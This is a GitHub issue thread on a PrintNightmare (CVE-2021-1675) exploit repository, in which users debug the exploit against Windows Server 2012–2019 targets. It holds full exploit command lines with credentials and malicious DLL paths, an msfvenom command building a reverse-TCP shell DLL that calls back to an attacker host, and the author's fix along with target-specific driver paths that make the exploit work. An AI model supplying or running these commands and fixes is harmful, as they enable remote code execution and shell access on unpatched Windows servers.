cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

ERROR_PATH_NOT_FOUND #3

Closed kevthehermit closed 3 years ago

kevthehermit commented 3 years ago

Hitting this error,

Target Server 2016 Datacenter

root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@ssw0rd!@172.31.35.104' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 119, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 55, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

MortalAndTry commented 3 years ago

hhhh

kevthehermit commented 3 years ago

Same error on a Server 2019 Datacenter

tuian commented 3 years ago

0x00 ERROR_PATH_NOT_FOUND

same on win dc server 2012/server 2016

[*] Try 1...
[*] Connecting to ncacn_np:192.168.44.10[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.44.20\share\1.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/Library/Python/2.7/site-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py2.7.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/Library/Python/2.7/site-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py2.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

0x02 the unc path is correct.


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.44.30 LPORT=8080 -b "\x00" -e x86/shikata_ga_nai -f dll -o /tmp/1.dll
// it is ok 
copy  \\192.168.44.20\share\1.dll .
rundll32  1.dll,Start
// it is ok 
rundll32  \\192.168.44.20\share\1.dll,Start

cube0x0 commented 3 years ago

The API could not find your DLL, or this file is missing: https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py#L43

Replace the line with one matching your OS build

kevthehermit commented 3 years ago

Thanks. For reference, here are the paths I had with the build numbers:

OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763

container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"

OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64

RENYONGTONG commented 3 years ago

> Thanks. For reference, here are the paths I had with the build numbers:
>
> OS Name:                   Microsoft Windows Server 2019 Datacenter
> OS Version:                10.0.17763 N/A Build 17763
>
> container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"
>
> OS Name:                   Microsoft Windows Server 2016 Datacenter
> OS Version:                10.0.14393 N/A Build 14393
>
> C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
> C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64

Same issue. May I ask how you determine your build numbers and the path of the driver? Further, can I have a copy of the DLL file for testing? I am a freshman and don't know how to generate one. Thanks.

LLPMR commented 3 years ago

> Thanks. For reference, here are the paths I had with the build numbers:
>
> OS Name:                   Microsoft Windows Server 2019 Datacenter
> OS Version:                10.0.17763 N/A Build 17763
>
> container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"
>
> OS Name:                   Microsoft Windows Server 2016 Datacenter
> OS Version:                10.0.14393 N/A Build 14393
>
> C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
> C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64
>
> Same issue. May I ask how you determine your build numbers and the path of the driver? Further, can I have a copy of the DLL file for testing? I am a freshman and don't know how to generate one. Thanks.

Did you find the answer?